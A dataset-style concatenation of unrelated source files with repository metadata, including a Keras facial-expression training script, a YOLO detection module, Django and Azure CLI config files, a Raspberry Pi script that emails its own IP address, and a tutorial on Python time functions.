cdf053a52f25af7b85523a36dc43a01d2e912c6c | 6d56602872bf0e307538e1db72a43c00f039b450 | /tests/test_daemon_context.py | 0615d666859e777d51e1a4e5b0b677f7bc9e2295 | [
"ISC"
] | permissive | josephturnerjr/boatshoes | 6b566276411ed74302f932dff34620e6e7a95087 | 7f5c871ea796080551440464cb09fcb1c21c400e | refs/heads/master | 2021-01-23T14:04:57.835548 | 2012-02-14T16:38:15 | 2012-02-14T16:38:15 | 2,929,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | import unittest
import sys
import os.path
sys.path.append(os.path.join(os.path.split(__file__)[0], '..'))
from boatshoes.DaemonContext import DaemonContext
class TestDaemonContext(unittest.TestCase):
def setUp(self):
pass
def test_daemonize(self):
try:
with DaemonContext(True) as dc:
# only the child makes it in
print dc # won't be printed
except SystemExit, e:
self.assertTrue(e.code == 0)
def test_return_code(self):
try:
with DaemonContext(True) as dc:
# only the child makes it in
print "yep" # won't be printed
dc.return_value = -1
except SystemExit, e:
self.assertTrue(e.code == -1)
def test_noop(self):
# Shouldn't throw
with DaemonContext(False) as dc:
# If you pass in False, DaemonContext is a no-op
# print "yep" # this one would be printed
dc.return_value = -1
if __name__ == "__main__":
unittest.main()
| [
"turner@miserware.com"
] | turner@miserware.com |
e0c83232aa5f928d75db9d99f970900550b2941c | f228254008e82d0136821eab3cf535b02e738d9d | /myapp/urls.py | 2680d357ae564980a96525fa7f57db96c83beeff | [] | no_license | pradhyumvyas/Django-Starting | 68a46a225debbd32e165422c0a9092d02f71603d | 6e8e9b6f02fc553a94d29e62bd6f319ff35396ea | refs/heads/master | 2022-12-03T10:21:27.701497 | 2020-07-24T20:37:31 | 2020-07-24T20:37:31 | 265,812,873 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | py | from django.contrib import admin
from django.urls import path
from myapp import views
urlpatterns = [
path('', views.index, name='home'),
path('about', views.about, name='about'),
path('services', views.service, name='service'),
path('contact', views.contact, name='contact'),
]
| [
"pradhyumvyas92@gmail.com"
] | pradhyumvyas92@gmail.com |
81584208ba19bae03d4f4f7d1847c0b03c0bb2b3 | 62402e4833b7e713a488e533f1ccfc22862d43d5 | /yolo_model/detect.py | 2a21e72ec266dabb103680a8ff0af2f37e8e550a | [] | no_license | Rip-Hunter/hackathon_traffic_light | bf8185e8e1aed39e756c73cb66fac15a4f4ad0a0 | b9dd5e6cc6761e0ef688ac501616900bf4464305 | refs/heads/master | 2022-12-25T06:15:54.522294 | 2020-10-03T18:30:26 | 2020-10-03T18:30:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,614 | py | import argparse
from .models import * # set ONNX_EXPORT in models.py
from .utils.datasets import *
from .utils.utils import *
from typing import List
# x0y0 - left down
# x1y1 - up right
class BBox:
def __init__(self, x0, y0, x1, y1, class_index, confidence: float):
self.x0 = x0
self.y0 = y0
self.x1 = x1
self.y1 = y1
self.class_index = class_index
self.confidence = confidence
def create_model(cfg, weights, imgsz, half=False, device="cpu") -> (Darknet, str):
# increase speed? idk
torch.backends.cudnn.benchmark = True
# Initialize
device = torch_utils.select_device(device)
# Initialize model
model = Darknet(cfg, imgsz)
# Load weights
model.load_state_dict(torch.load(weights, map_location=device)['model'])
# Eval mode
model.to(device).eval()
# Fuse Conv2d + BatchNorm2d layers
# model.fuse()
# Half precision
half = half and device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Run inference
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img.float()) if device.type != 'cpu' else None # run once
return model, device
def detect(model, img0, img_size, half=False, device="cpu", conf_thres=0.3, iou_thres=0.6, augment=False) -> np.ndarray:
"""
:return: array of rows where the elements are x0, y0, x1, y1, confidence, class
"""
# convert frame to network friendly format
# Padded resize
img = letterbox(img0, new_shape=img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(device)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
if img.ndimension() == 3:
img = img.unsqueeze(0)
# Inference
t1 = torch_utils.time_synchronized()
pred = model(img, augment=augment)[0]
t2 = torch_utils.time_synchronized()
# to float
if half:
pred = pred.float()
# Apply NMS
pred = non_max_suppression(pred, conf_thres, iou_thres,
multi_label=False, classes=None, agnostic=False)
boxes = []
# Process detections
for i, det in enumerate(pred): # detections for image i
if det is not None and len(det):
# Rescale boxes from imgsz to im0 size
det[:, :4] = scale_coords(img.shape[2:], det[:, :4], img0.shape).round()
# Write results
for row in det:
# .data[0] to convert tensors to numbers
boxes.append(row.cpu().numpy())
# print(f"inference time: {t2 - t1:.2}s")
return np.stack(boxes, axis=0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--cfg', type=str, default='cfg/yolov3-spp.cfg', help='*.cfg path')
parser.add_argument('--names', type=str, default='data/coco.names', help='*.names path')
parser.add_argument('--weights', type=str, default='weights/yolov3-spp-ultralytics.pt', help='weights path')
parser.add_argument('--source', type=str, default='data/samples', help='source') # input file/folder, 0 for webcam
parser.add_argument('--output', type=str, default='output', help='output folder') # output folder
parser.add_argument('--img-size', type=int, default=512, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.3, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--fourcc', type=str, default='mp4v', help='output video codec (verify ffmpeg support)')
parser.add_argument('--half', action='store_true', help='half precision FP16 inference')
parser.add_argument('--device', default='', help='device id (i.e. 0 or 0,1) or cpu')
parser.add_argument('--view-img', action='store_true', help='display results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--classes', nargs='+', type=int, help='filter by class')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
# opt = parser.parse_args()
# opt.cfg = check_file(opt.cfg) # check file
# opt.names = check_file(opt.names) # check file
# print(opt)
# with torch.no_grad():
# detect()
| [
"ma.ba1@rambler.ru"
] | ma.ba1@rambler.ru |
24b4f0e558b941cbedb6f36f6594b395773a7db1 | 6aec2583b4246eac64e110e733d2d20a4029075b | /src/command_modules/azure-cli-redis/setup.py | 8aa7a328e6c190e05e614e726064a1ab4a295c4f | [
"MIT"
] | permissive | erich-wang/azure-cli | c85953fe63b71b055819d55de9b3136896e346db | ebb72c97491c52b2b5d31c8e5ad9f79f412c136b | refs/heads/master | 2020-12-11T07:53:55.999508 | 2017-01-23T23:57:59 | 2017-01-23T23:57:59 | 64,140,742 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,791 | py | #!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from codecs import open
from setuptools import setup
VERSION = '0.1.1b1+dev'
# The full list of classifiers is available at
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'License :: OSI Approved :: MIT License',
]
DEPENDENCIES = [
'azure-mgmt-redis==1.0.0',
'azure-cli-core',
]
with open('README.rst', 'r', encoding='utf-8') as f:
README = f.read()
with open('HISTORY.rst', 'r', encoding='utf-8') as f:
HISTORY = f.read()
setup(
name='azure-cli-redis',
version=VERSION,
description='Microsoft Azure Command-Line Tools Redis Command Module',
long_description=README + '\n\n' + HISTORY,
license='MIT',
author='Microsoft Corporation',
author_email='azpycli@microsoft.com',
url='https://github.com/Azure/azure-cli',
classifiers=CLASSIFIERS,
namespace_packages=[
'azure',
'azure.cli',
'azure.cli.command_modules',
],
packages=[
'azure.cli.command_modules.redis',
],
install_requires=DEPENDENCIES,
)
| [
"noreply@github.com"
] | erich-wang.noreply@github.com |
d6eab2c021daa012233182dd8b6ba5e039bf5040 | 979ab48d26a168ec7614e27583c91cd86915dbd6 | /train.py | a19d3ec01897a69a1f6ba878fa9adf3bd6ebf34d | [] | no_license | abhran/Face-Expression-recognition | 6d6a7ac29fda1aaa72cfaea171b0ffdb5eff6f48 | f0e697f66c8d280cfd0265f74ffe53a5c147ebc3 | refs/heads/main | 2023-08-30T21:14:14.111113 | 2021-10-17T12:02:48 | 2021-10-17T12:02:48 | 311,151,567 | 5 | 1 | null | 2020-11-28T19:36:03 | 2020-11-08T20:46:44 | Python | UTF-8 | Python | false | false | 7,358 | py | import os
import tqdm
from PIL import Image
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from ast import literal_eval
import tensorflow as tf
from keras.activations import relu
# import keras
import keras
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D,MaxPooling2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.callbacks import CSVLogger
from keras.optimizers import Adam
from keras.models import load_model
# no=100
# model=load_model(f"saved_model/senti_save_model{no}.h5")
# K.tensorflow_backend.set_session(sess)
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True # dynamically grow the memory used on the GPU
# config.log_device_placement = True # to log device placement (on which device the operation ran)
# sess = tf.Session(config=config)
# set_session(sess) # set this TensorFlow session as the default session for Keras
tf.compat.v1.keras.backend.set_session(tf.compat.v1.Session(config=config))
# def train(x):
def train(x):
# first input model
# visible = Input(shape=input_shape, name='input')
num_classes = 7
#the 1-st block
conv1_1 = Conv2D(64, kernel_size=3, activation='relu', padding='same', name = 'conv1_1')(x)
conv1_1 = BatchNormalization()(conv1_1)
conv1_2 = Conv2D(64, kernel_size=3, activation='relu', padding='same', name = 'conv1_2')(conv1_1)
conv1_2 = BatchNormalization()(conv1_2)
pool1_1 = MaxPooling2D(pool_size=(2,2), name = 'pool1_1')(conv1_2)
drop1_1 = Dropout(0.3, name = 'drop1_1')(pool1_1)
#the 2-nd block
conv2_1 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_1')(drop1_1)
conv2_1 = BatchNormalization()(conv2_1)
conv2_2 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_2')(conv2_1)
conv2_2 = BatchNormalization()(conv2_2)
conv2_3 = Conv2D(128, kernel_size=3, activation='relu', padding='same', name = 'conv2_3')(conv2_2)
conv2_2 = BatchNormalization()(conv2_3)
pool2_1 = MaxPooling2D(pool_size=(2,2), name = 'pool2_1')(conv2_3)
drop2_1 = Dropout(0.3, name = 'drop2_1')(pool2_1)
#the 3-rd block
conv3_1 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_1')(drop2_1)
conv3_1 = BatchNormalization()(conv3_1)
conv3_2 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_2')(conv3_1)
conv3_2 = BatchNormalization()(conv3_2)
conv3_3 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_3')(conv3_2)
conv3_3 = BatchNormalization()(conv3_3)
conv3_4 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv3_4')(conv3_3)
conv3_4 = BatchNormalization()(conv3_4)
pool3_1 = MaxPooling2D(pool_size=(2,2), name = 'pool3_1')(conv3_4)
drop3_1 = Dropout(0.3, name = 'drop3_1')(pool3_1)
#the 4-th block
conv4_1 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_1')(drop3_1)
conv4_1 = BatchNormalization()(conv4_1)
conv4_2 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_2')(conv4_1)
conv4_2 = BatchNormalization()(conv4_2)
conv4_3 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_3')(conv4_2)
conv4_3 = BatchNormalization()(conv4_3)
conv4_4 = Conv2D(256, kernel_size=3, activation='relu', padding='same', name = 'conv4_4')(conv4_3)
conv4_4 = BatchNormalization()(conv4_4)
pool4_1 = MaxPooling2D(pool_size=(2,2), name = 'pool4_1')(conv4_4)
drop4_1 = Dropout(0.3, name = 'drop4_1')(pool4_1)
#the 5-th block
conv5_1 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_1')(drop4_1)
conv5_1 = BatchNormalization()(conv5_1)
conv5_2 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_2')(conv5_1)
conv5_2 = BatchNormalization()(conv5_2)
conv5_3 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_3')(conv5_2)
conv5_3 = BatchNormalization()(conv5_3)
conv5_4 = Conv2D(512, kernel_size=3, activation='relu', padding='same', name = 'conv5_4')(conv5_3)
conv5_3 = BatchNormalization()(conv5_3)
pool5_1 = MaxPooling2D(pool_size=(2,2), name = 'pool5_1')(conv5_4)
drop5_1 = Dropout(0.3, name = 'drop5_1')(pool5_1)
#Flatten and output
flatten = Flatten(name = 'flatten')(drop5_1)
output = Dense(num_classes, activation='softmax', name = 'output')(flatten)
return output
# Build the model graph: 48x48 grayscale faces -> emotion class probabilities.
inp = keras.Input(shape=(48, 48, 1))
x = train(inp)
model = keras.Model(inp, x)
# (an ExponentialDecay learning-rate schedule was tried here previously)
opt = Adam(lr=0.0005, decay=0.0005 / 10)
loss = tf.keras.losses.categorical_crossentropy
model.compile(optimizer=opt, loss=loss, metrics=['accuracy'])
print(model.summary())

# Validation split: rows 32000 onward of the training labels, with the
# pre-extracted pixel matrix from filexxx.csv (first column is an index).
datax = pd.read_csv('filexxx.csv').astype(int)
data = pd.read_csv('Train.csv')
datay = data['emotion'].astype(int)
y = datay.iloc[32000:]
yval = np.array(pd.get_dummies(y, prefix='emotion'))
x = np.array(datax)[:, 1:]
# scale pixels from [0, 255] into [-1, 1]
xval = x.reshape(3887, 48, 48, 1) / 127.5 - 1

datay = data['emotion'].astype(int)
hist = pd.DataFrame({'acc': [], "loss": [], "val_acc": [], "val_loss": []})
for j in range(1, 1001):
    for i in range(0, 8):
        hist_ = {'acc': 0, "loss": 1, "val_acc": 2, "val_loss": 3}
        print(f"Epoch : {j}/{1000} ", end="")
        print(f"Batch : {(i)*125}/{125*8}")
        # each file{i}.csv holds one shard of 4000 training images
        datax = pd.read_csv(f'file{i}.csv').astype(int)
        y = datay.iloc[i*4000:(i+1)*4000]
        ytest = y
        x = np.array(datax)[:, 1:]
        x_ = x.reshape(4000, 48, 48, 1)
        y_ = np.array(pd.get_dummies(y, prefix='emotion'))
        x = x_ / 127.5 - 1
        history_callback = model.fit(x, y_, batch_size=32, epochs=1, validation_data=(xval, yval), shuffle=True, verbose=1)
        hist_["acc"] = history_callback.history['accuracy']
        hist_["loss"] = history_callback.history["loss"]
        hist_["val_acc"] = history_callback.history['val_accuracy']
        hist_["val_loss"] = history_callback.history['val_loss']
        hist = pd.concat([hist, pd.DataFrame(hist_)])
        print(hist)
    # checkpoint the history and the model every 10 passes over the shards
    if j % 10 == 0:
        hist.to_csv(f"val_rerun/history{j}.csv")
        model.save(f'saved_model_rerun/senti_saved_model{j}.h5')
| [
"noreply@github.com"
] | abhran.noreply@github.com |
173d992267a4c50b4df509c54add6f9396d75fbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02821/s313302941.py | 271131d42505bd3b94253e5c4d6e944e2905ed13 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
    """Return the prefix-sum list of s: length len(s)+1, starting with 0."""
    prefix = [0]
    total = 0
    for value in s:
        total += value
        prefix.append(total)
    return prefix
def bs_list(a, f):
    """Binary search: smallest index i with f(a[i]) true, or None if none.

    Assumes f is monotone over a (False ... False True ... True).
    """
    lo = -1
    hi = len(a)
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if f(a[mid]):
            hi = mid
        else:
            lo = mid
    if hi == len(a):
        return None
    return hi
a.sort()
ca = cumsum(a)
def detect(x):
    """Return True iff at most m pairs (i, j) have a[i] + a[j] >= x.

    Relies on the module-level sorted list `a`, its length `n` and the
    handshake budget `m`; uses bs_list to count, per element b, how many
    partners y satisfy y >= x - b.
    """
    pairs = 0
    for b in reversed(a):
        idx = bs_list(a, lambda y: y >= x - b)
        if idx is None:
            # b is too small to ever reach x; smaller b's cannot either
            break
        pairs += n - idx
    return pairs <= m
# Binary search the smallest threshold r such that the number of pairs with
# sum >= r is at most m; l = r - 1 is then the largest sum value that must
# be partially counted to reach exactly m pairs.
l, r = -1, 10**5*2+10
while r - l > 1:
    x = (l+r) // 2
    if detect(x): r = x
    else: l = x
# Sum the values of the c pairs whose sum is >= r (using the prefix sums in
# ca), then add the remaining m - c pairs at value l.
s, c = 0, 0
for b in a[::-1]:
    res = bs_list(a, lambda x: x >= r - b)
    if res is None: break
    c += (n - res)
    s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d7d9d0bb130dfd306c0dce147eb5b45376f0d532 | 304bd3654cb4773613a7eed9ea0c36dab9a45da7 | /uni_code.py | 8d52dedfcd60ff00c0672e1d409e82d67e5afd94 | [] | no_license | Padma-1/unicode | 52fe6a68b1a1fe74a76a1847489815c5d06c2179 | 180b75b63794eda19e061b7fd137d66550ea1061 | refs/heads/master | 2022-12-09T01:52:16.017170 | 2020-09-12T13:08:52 | 2020-09-12T13:08:52 | 294,945,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | unicode = {0:9471,1:10102,2:10103,3:10104,4:10105,5:10106,6:10107,7:10108,8:10109,9:10110,10:10111}
# Read a string of digits; `unicode` (the dict defined above) maps each
# digit to the code point of its circled-digit symbol.
x = (input("Insert digits 0-9:"))#0123456789-->any number u can give
num = " "
for i in x:
    i=int(i)
    # convert the digit to its circled-digit character
    i=chr(unicode[i])
    num=num+i
print("the result of unicode =%s"%num)#⓿❶❷❸❹❺❻❼❽❾-->%s is must in code
| [
"noreply@github.com"
] | Padma-1.noreply@github.com |
734019477f6f103006befcfb0b04e7f2c6331473 | ee57bec712f3f75629490e100e1bd244bc152db8 | /demo/migrations/0008_alter_demo_thumbnail.py | e7b5116a7043d161fd2644ecd0921c9fffc3b9db | [
"MIT"
] | permissive | DevKor-Team/devkor_hackathon_back | f7f9a9c14d68ab89a340dcfde7411dde50652a48 | 435fd0552a1efdc7995698bf64b5f7104f3de193 | refs/heads/develop | 2023-07-21T22:26:13.201391 | 2021-08-22T04:05:46 | 2021-08-22T04:05:46 | 364,278,326 | 0 | 0 | MIT | 2021-08-22T03:55:57 | 2021-05-04T14:11:54 | Python | UTF-8 | Python | false | false | 405 | py | # Generated by Django 3.2.1 on 2021-08-21 16:51
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: make Demo.thumbnail optional (blank/null).
    dependencies = [
        ("demo", "0007_demo_show"),
    ]
    operations = [
        migrations.AlterField(
            model_name="demo",
            name="thumbnail",
            field=models.ImageField(blank=True, null=True, upload_to="images/"),
        ),
    ]
| [
"cndghks15@gmail.com"
] | cndghks15@gmail.com |
47a55a1244fdbd065fac85c3af66d6f86bba490e | 7bfe45e34619e4c90ac621700a8d140634220b46 | /linux自动发送IP.py | 8f7da0f3cca4e2a72d7e83909efe845f6ba833c6 | [] | no_license | maxuehao/Python-script | f03479269581f2ec911e69cc1473e62f6f6eb23d | 8448a51908d1c3e8b10a449cd5bf6fdd55a23f66 | refs/heads/master | 2020-05-23T18:02:53.890209 | 2017-05-15T00:09:18 | 2017-05-15T00:09:18 | 84,777,121 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | # -*- coding: utf-8 -*-
import smtplib
from email.mime.text import MIMEText
from email.header import Header
import socket
import os
# Check for network connectivity: block until a ping succeeds.
while True:
    return1=os.system('ping -c 2 www.baidu.com')
    if return1 == 0:
        print ('ok')
        break
    else:
        print ('no')
#获取本地ip
def Get_local_ip():
    """Return the local IP address used for outbound traffic.

    Falls back to "127.0.0.1" when no route/network is available.
    """
    try:
        csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            # connect() on a UDP socket sends no packets; it only asks the
            # OS which local address would be used to reach this host.
            csock.connect(('8.8.8.8', 80))
            (addr, port) = csock.getsockname()
        finally:
            # close the socket even if connect()/getsockname() raises,
            # instead of leaking it on the error path
            csock.close()
        return addr
    except socket.error:
        # no usable network: fall back to loopback
        return "127.0.0.1"
if __name__ == "__main__":
    ip = Get_local_ip()
    # Send this machine's IP address by email to the owner's mailbox.
    # NOTE(review): smtpserver is defined but connect() hard-codes the host.
    sender = '15624985416@sina.cn'
    receiver = 'maxuehao123@outlook.com'
    subject = 'From Raspberry Pi '
    smtpserver = 'smtp.sina.cn'
    username = '*****'
    password = '*****'
    message = MIMEText(ip, 'plain', 'utf-8')
    message['Subject'] = Header(subject, 'utf-8')
    smtp = smtplib.SMTP()
    smtp.connect('smtp.sina.cn')
    smtp.login(username, password)
    smtp.sendmail(sender, receiver, message.as_string())
    smtp.quit()
| [
"maxuehao123@outlook.com"
] | maxuehao123@outlook.com |
ca927e74c401ed7237e800785a6fa3559d18ef8b | 9f7aad21936e59161573f29cc9bcfd0136c341ad | /alien_invasion.py | f65eccd8582545724593fc55f21614a4ed231238 | [] | no_license | pedrohbferreira/alien_invasion_livro | f9cff8448605e8ab2db34a01c7ef227370f7f23b | 590467922c939dd79e1aaf95508dbc00e5be2f9d | refs/heads/master | 2020-03-30T04:54:29.869667 | 2019-02-26T15:30:09 | 2019-02-26T15:30:09 | 150,768,367 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,013 | py | # -*- coding: utf-8 -*-
import sys
import pygame
from pygame.sprite import Group
from pygame import Surface
import game_funcions as gf
from settings import Settings
from ship import Ship
from game_stats import GameStats
from button import Button
from scoreboard import Scoreboard
def run_game():
    """Initialize pygame, build all game objects and run the main loop."""
    # Start the game and create an object for the screen
    pygame.init()
    ai_settings = Settings()
    ai_settings.set_icon("alien_icon_32x32.bmp")
    # create a screen with the dimensions from ai_settings
    screen = pygame.display.set_mode(
        (ai_settings.screen_width, ai_settings.screen_height)
    ) # type: Surface
    pygame.display.set_caption("Alien Invasion")
    # create the bullet group; every fired bullet lives here
    bullets_group = Group()
    aliens_group = Group()
    # create the ship
    ship = Ship(ai_settings, screen)
    # create the alien fleet
    gf.create_fleet(ai_settings, screen, ship.rect.height, aliens_group)
    # create the statistics instance and its scoreboard
    stats = GameStats(ai_settings)
    score_board = Scoreboard(ai_settings, screen, stats)
    # create the Play button instance
    btn_play = Button(screen, "Play")
    # Start the game's main loop; all events are handled in here
    while True:
        # listen for mouse or keyboard events
        gf.check_events(ai_settings, screen, stats, score_board, btn_play, ship, aliens_group, bullets_group)
        if stats.game_active:
            # update the ship's position
            ship.update()
            # update and clean up the bullets
            gf.update_bullets(ai_settings, screen, stats, score_board, ship.rect.height, bullets_group, aliens_group)
            # update the aliens' positions
            gf.update_aliens(ai_settings, stats, score_board, screen, ship, aliens_group, bullets_group)
        # redraw the screen contents
        gf.update_screen(ai_settings, screen, stats, score_board, ship, aliens_group, bullets_group, btn_play)
run_game()
| [
"pedrobarreto.ti@outlook.com"
] | pedrobarreto.ti@outlook.com |
48029ad550be99084bdc75771e75b28299f992dd | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/28_1.py | 8bba51f3b7f6bc07e66c3cce6c8bb5320e828687 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python has defined a module, “time” which allows us to handle various
operations regarding time, its conversions and representations, which find its
use in various applications in life. In Python, time measurement begins
from **1 January 1970, 12:00 am**, and this reference point is termed the
“**epoch**”.
**Operations on Time :**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**
each representing a time attribute in sequence. It converts **seconds into
time attributes(days, years, months etc.)** till specified seconds from epoch.
If no seconds are mentioned, time is calculated till present. The structure
attribute table is given below.
Index Attributes Values
0 tm_year 2008
1 tm_mon 1 to 12
2 tm_mday 1 to 31
3 tm_hour 0 to 23
4 tm_min 0 to 59
5 tm_sec 0 to 61 (60 or 61 are leap-seconds)
6 tm_wday 0 to 6
7 tm_yday 1 to 366
8 tm_isdst -1, 0, 1 where -1 means
Library determines DST
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
---
__
__
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
**3\. asctime(“time”)** :- This function takes a time attributed string
produced by gmtime() and returns a **24 character string denoting time**.
**4\. ctime(sec)** :- This function returns a **24 character time string** but
takes seconds as argument and **computes time till mentioned seconds**. If no
argument is passed, time is calculated till present.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to diplay time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
---
__
__
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **halt the program execution**
for the time specified in the arguments.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to halt execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
---
__
__
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**. If you like GeeksforGeeks
and would like to contribute, you can also write an article using
contribute.geeksforgeeks.org or mail your article to
contribute@geeksforgeeks.org. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share
more information about the topic discussed above.
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"qmnguyenw@gmail.com"
] | qmnguyenw@gmail.com |
18e68b2aa1b9e85929478d50bbd118e19024a819 | b962e46ca567cdc653ddf4083a67a8a71bdb8c54 | /fw/torch_model/MLPWrapper.py | 4e77794d9a6b4127fe0d0e347080ba768143b247 | [] | no_license | MannyKayy/pytorch-chainer-combination | 6ff5d56c1123bb2e37fb6336a90ca5160a16a541 | 7d87cf0f13a82f572ac5a29d0aa6adbefd2f1a83 | refs/heads/master | 2022-09-24T13:53:20.914614 | 2020-06-07T23:31:08 | 2020-06-07T23:31:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | from fw.torch_model.MLP import MLP
class MLPWrapper(MLP):
    # Thin adapter so a Chainer-style evaluator extension can drive the MLP.
    def forward(self, *args, **kwargs):
        # the evaluator calls forward(x, t); the underlying MLP only takes x
        return super(MLPWrapper, self).forward(args[0])
    def namedlinks(self, skipself=False):
        # Hack for the evaluator extension to work
        return []
| [
"43694878+take0212@users.noreply.github.com"
] | 43694878+take0212@users.noreply.github.com |
ab4d28686d9667d4d1599726cc48f421005ecf3c | e0fc3c4c95322d9f8e5cd486e7414f392768be9f | /deneme_tkinter.py | 1f3edc0911a82da6102e9bc14e6a72a9d12d8ef7 | [] | no_license | harunresit/project_2_d_scanner | d7cb18dca22cd3eb6caf618bf758b941b36f6777 | 17a23b8bdea4470a52b21f700473e8fbb46c0265 | refs/heads/master | 2022-04-08T17:20:04.618368 | 2020-03-10T06:22:10 | 2020-03-10T06:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,606 | py | #import tkinter as tk
#
#frame = tk.Tk() #tkinter modülünden Tk sınıfı ile bir nesne oluşturduk
#frame.geometry('500x500') #geometry method'dur
#
#print(dir(frame))
#frame.mainloop()
#frame.destroy()
#import tkinter as tk
#
#pencere = tk.Tk()
#
#def çıkış():
# etiket['text'] = 'Elveda zalim dünya...'
# düğme['text'] = 'Bekleyin...'
# düğme['state'] = 'disabled'
# pencere.after(2000, pencere.destroy)
#
#etiket = tk.Label(text='Merhaba Zalim Dünya')
